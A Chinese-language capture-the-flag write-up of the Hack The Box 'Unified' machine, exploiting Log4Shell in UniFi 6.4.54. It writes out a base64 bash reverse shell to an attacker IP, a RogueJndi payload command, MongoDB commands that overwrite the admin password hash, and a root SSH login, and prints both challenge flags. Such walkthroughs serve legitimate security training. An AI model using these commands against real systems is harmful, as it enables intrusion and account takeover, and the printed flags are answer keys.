HTB:Unified[WriteUP]

目录

连接至HTB服务器并启动靶机

1.Which are the first four open ports?

2.What is the title of the software that is running running on port 8443?

3.What is the version of the software that is running?

4.What is the CVE for the identified vulnerability?

5.What protocol does JNDI leverage in the injection?

6.What tool do we use to intercept the traffic, indicating the attack was successful?

7.What port do we need to inspect intercepted traffic for?

8.What port is the MongoDB service running on?

USER_FLAG:6ced1a6a89e666c0620cdb10262ba127

9.What is the default database name for UniFi applications?

10.What is the function we use to enumerate users within the database in MongoDB?

11.What is the function we use to update users within the database in MongoDB?

12.What is the password for the root user?

ROOT_FLAG:e50bc93c75b634e4b272d2f771c33681


连接至HTB服务器并启动靶机

靶机IP:10.129.55.252

分配IP:10.10.16.48


1.Which are the first four open ports?

使用nmap对靶机开放端口进行扫描:

nmap -Pn {TARGET_IP}

可见开放端口为:22,6789,8080,8443


2.What is the title of the software that is running running on port 8443?

使用nmap对靶机的8443端口进行脚本扫描:

nmap -sC -p 8443 -Pn {TARGET_IP}

通过扫描结果可以看到:http-title: UniFi Network


3.What is the version of the software that is running?

直接使用浏览器访问靶机:http://{TARGET_IP}:8443

可以看到UniFi的软件版本为:6.4.54


4.What is the CVE for the identified vulnerability?

我们在cve.mitre.org平台,对UniFi进行相关搜索:

平台地址:https://cve.mitre.org/

可以看到CVE-2021-44530可以影响到UniFi 6.5.53及以前的版本:

答案中填写描述中的Log4J漏洞代号:CVE-2021-44228


5.What protocol does JNDI leverage in the injection?

JNDI 在注入中利用两个协议,分别是:

LDAP 协议:

(轻量级目录访问协议,可构造恶意数据让应用连接攻击者控制的服务器执行远程代码)

RMI 协议:

(远程方法调用协议,攻击者创建恶意服务器注册远程对象让应用获取执行恶意代码)


6.What tool do we use to intercept the traffic, indicating the attack was successful?

在登录界面勾选Remember me,输入账号密码后点击SIGN IN

启动Yakit抓取登录流量并发送,本地端开启tcpdump抓取本地流量:


7.What port do we need to inspect intercepted traffic for?

另起一终端,使用tcpdump抓取本地389端口流量(LDAP默认端口)

tcpdump -i tun0 port 389

在Yakit端点击提交数据,tcpdump抓取流量成功,证明漏洞存在:


8.What port is the MongoDB service running on?

接下来手搓一个反弹shell,先制作base64编码过的payload:

echo 'bash -i >&/dev/tcp/{NATIVE_IP}/{NATIVE_PORT} 0>&1' | base64

接下来使用RogueJndi-1.1.jar用于制作JNDI注入木马:

工具安装:
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package
java -jar RogueJndi-1.1.jar --command "bash -c {echo,{YOUR_BASE64_STRING}}|{base64,-d}|{bash,-i}" --hostname "{NATIVE_IP}"

接下来再使用nc开启端口持续监听反弹shell:

注:刚开始我弹shell一直不成功,如果你也有同样的问题,检查--command后代码的空格

nc -lvnp {NATIVE_PORT}

连接反弹shell后,重定向至bash并获得交互:

script /dev/null -c bash

接着使用find命令查找一下user用户flag:

find / -name 'user.txt' 2>/dev/null

USER_FLAG:6ced1a6a89e666c0620cdb10262ba127

使用ps命令查找mongo进程:

可以看到该数据库正在运行,并且占用端口:27117


9.What is the default database name for UniFi applications?

题目问的是:UniFi应用程序的默认数据库名称,我这里直接扔给秘塔AI:ace


10.What is the function we use to enumerate users within the database in MongoDB?

连接到mongo数据库,利用db.admin.find()函数列举出所有用户:

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

这里就拿到了administrator用户的密码哈希值:


11.What is the function we use to update users within the database in MongoDB?

使用hashid查看一下哈希类型:

SHA-512这种类型的哈希值是不太可能爆破的出来的

使用mkpasswd创建一个SHA-512类型的密码:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# mkpasswd -m sha-512 123456    
$6$KDE3zv2Zi2Tc3BXD$jT/jQlJ/fjQsdW.qSYnd09UhaqeVoOhqe2SPDet3TD/DoWLEHSFT.7KlI/yg3GG21dqPSi4j7W5wLFYH9Lx4Z/

接下来通过前面获取到的_id,对密码进行修改:

"_id" : ObjectId("61ce278f46e0fb0012d47ee4")

通过db.admin.update()函数,将administrator用户的密码修改成123456:

mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$KDE3zv2Zi2Tc3BXD$jT/jQlJ/fjQsdW.qSYnd09UhaqeVoOhqe2SPDet3TD/DoWLEHSFT.7KlI/yg3GG21dqPSi4j7W5wLFYH9Lx4Z/"}})'


12.What is the password for the root user?

重新回到浏览器登录界面,输入账户:administrator,密码:123456进行登录:

进入Web管理页面后,点击左下角的SETTINGS:

在SETTINGS二级目录site往下滑,找到root用户SSH登录口令:

root用户密码:NotACrackablePassword4U2022

尝试使用该密码进行SSH登录:

ssh root@{TARGET_IP}

使用find、cat命令查找并查看root.txt文件:

find / -name 'root.txt' 2>/dev/null
cat /root/root.txt

ROOT_FLAG:e50bc93c75b634e4b272d2f771c33681

上一篇:C或C++判断指针是否指向同一块内存-输出结果:


下一篇:Golang | Leetcode Golang题解之第452题用最少数量的箭引爆气球-题解: